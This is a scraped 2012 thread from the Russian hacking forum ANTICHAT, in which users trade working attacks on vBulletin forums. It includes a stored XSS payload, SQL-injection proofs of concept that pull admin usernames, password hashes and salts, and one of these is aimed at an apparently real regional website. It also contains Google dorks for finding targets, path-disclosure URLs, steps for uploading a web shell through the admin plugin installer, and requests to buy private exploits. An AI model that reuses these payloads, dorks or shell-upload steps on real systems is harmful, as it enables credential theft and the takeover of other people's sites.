ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.03.2012, 17:55
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Сообщение от OxoTnik
OxoTnik said:
Активная
XSS
Уязвимы все версий
Требуются права модератора
Идём
Панель модератора -> Управление разделами -> Объявление [
Редактировать
]
Рабочий пример (проверка на работоспособность)
Эксплуатация обычная
Америку открыл. Это не XSS, а фича. На ачате тоже работает.
|
|
|
16.03.2012, 15:56
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Spunoff
Spunoff said:
Если получить куки админа форума, в админку же всё равно будет повторно требоватся ввод пароля? Это можно обойти?
если админ заходил в admincp до этого, то куки будут с админкой, правда они не долго живут.
|
|
|
|
18.03.2012, 21:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от pharm_all
pharm_all said:
4.1.4 есть что-то может народ? 4.1.0-4.1.3 уже прикрыли скуль , может есть что-то в привате под новые версии рассмотрел бы . Пишите в личку!
В 4.1.4 тоже SQL-inj есть. Смотри Patchlevel в vbulletin_global.js. Если там просто "Vbulletin 4.1.4", то радуйся. А если рядом написано "Patchlevel n", то можешь др. способы искать.
|
|
|
|
28.03.2012, 05:23
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме:
72737
Репутация:
1
|
|
vBulletin 4.1.7 => 4.1.10 XSS Vulnerability
Vulnerability:
1.
Send New Private Message >
>
Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)
Watch the video: [http://vimeo.com/39049790]
1337day.com/exploits/17824
|
|
|
|
29.03.2012, 08:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от IMMORTAL_S
IMMORTAL_S said:
На одном ip висят 4.1.2, 4.1.3 PL1, 4.1.4.. пытался на всех провести sql-inj но выдает Forbidden.
С чем это может быть связано?
|
|
|
|
19.04.2012, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
39063
Репутация:
0
|
|
Да нет вопросов
Поехали
EasyPage SQL-Injection
Google Dork: intext:"vbulletin" inurl:"page.php?p=" [Result: 18 000]
File: /page.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]
[/COLOR][COLOR="#0000BB"]$pageid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]];
[...]
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$vbulletin[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query_first[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"
SELECT *
FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"easy_pages
WHERE varname = '[/COLOR][COLOR="#0000BB"]$pageid[/COLOR][COLOR="#DD0000"]'
LIMIT 1
"[/COLOR][COLOR="#007700"]);
[...][/COLOR][/COLOR]
PoC:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//stavropolregion.com/page.php?p=stavrop%27%20and%201=2%20union%20select%201,2,3,%28select+concat_ws%280x3b,username,password,salt%29+from+user+where+usergroupid=6%20limit%201%29,5%20--%20f[/COLOR][/COLOR]
File: /admincp/easy_pages_admin.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]
if ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$pageid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pageid'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query_first[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"
SELECT *
FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"easy_pages
WHERE pageid =[/COLOR][COLOR="#0000BB"]$pageid[/COLOR][COLOR="#DD0000"]
LIMIT 1
"[/COLOR][COLOR="#007700"]);
[...][/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]
if ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'edit_update'[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$varname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'varname'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'content'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$vbulletin[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query_write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"easy_pages
SET title = '[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#DD0000"]',
varname = '[/COLOR][COLOR="#0000BB"]$varname[/COLOR][COLOR="#DD0000"]',
content = '[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#DD0000"]',
table_wrap = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'table_wrap'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"'
WHERE pageid = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]pageid[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]";
"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]print_cp_redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'easy_pages_admin.php'[/COLOR][COLOR="#007700"]);
}
[...][/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]
if ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'add_update'[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'content'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$varname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'varname'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$vbulletin[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query_write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"easy_pages
SET title = '[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#DD0000"]',
varname = '[/COLOR][COLOR="#0000BB"]$varname[/COLOR][COLOR="#DD0000"]',
content = '[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#DD0000"]',
table_wrap = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'table_wrap'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"'
"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]print_cp_redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'easy_pages_admin.php'[/COLOR][COLOR="#007700"]);
}
[...][/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]
if ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'delete_page'[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$vbulletin[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query_write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"easy_pages WHERE pageid = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pageid'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"' LIMIT 1"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]print_cp_redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'easy_pages_admin.php'[/COLOR][COLOR="#007700"]);
}
[...][/COLOR][/COLOR]
Было успешно найдено
(c) Boolean, 0x0000ed.com, 2012.
Было успешно взято
(с) Grabberz.com |
|
|
|
02.07.2012, 15:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
1579
Репутация:
0
|
|
vBulletin 3.8.x
Сообщение от None
/arcade.php?act=Arcade&do=stats&comment=a&s_id=1%20 AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28* %29,CONCAT%28%28SELECT%20CONCAT%28email,%20userid, %200x3a,%20username,%200x3a,%20password,0x3a,salt% 29%20FROM%20user%20WHERE%20id%20=%201%29,FLOOR%28R AND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CH ARACTER_SETS%20GROUP%20BY%20x%29a%29
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$ibforums[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]input[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'s_id'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]ibp_cleansql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ibforums[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]input[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'s_id'[/COLOR][COLOR="#007700"]] );
[/COLOR][/COLOR]
Раскрытие путей
Сообщение от None
http://localhost/search.php?do[]=1337
http://localhost/profile.php?do[]=1337
http://localhost/subscription.php?do[]=1337
|
|
|
|
15.07.2012, 18:25
|
|
Новичок
Регистрация: 13.02.2010
Сообщений: 0
Провел на форуме:
3855
Репутация:
0
|
|
Раскрытие путей в последней версии(4.2.0)
Нужны как минимум права модера.
Код:
Code:
http://localhost/modcp/index.php?do[]=head
https://localhost/modcp/index.php?do[]=home
|
|
|
|
23.08.2012, 02:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Заливка шелла в 4.0.7 плюс\минус
Требуется доступ в админку.
Код HTML:
HTML:
Заходим в админку
Продукты и модули -> Сохранить\загрузить модули
Выбираем плагин-шелл (приложен снизу).
Устанавливаем.
Переходим в Коммерческая подписка -> Управление подпиской
http://www.sendspace.com/file/rz0609 |
|
|
|
27.10.2012, 20:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
Сообщение от Artyomka27
Artyomka27 said:
Есть что на vBulletin® Version 4.1.12 ?
Сообщение от None
Author : IrIsT.Ir
Discovered By : Am!r
Home : http://IrIsT.Ir/forum
Software Link : http://www.Vbulletin.com/
Security Risk : High
Version : All Version
Tested on : GNU/Linux Ubuntu - Windows Server - win7
Dork : intext:"Powered By Vbulletin 4.1.12"
Exp.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//target.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql][/COLOR][/COLOR]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
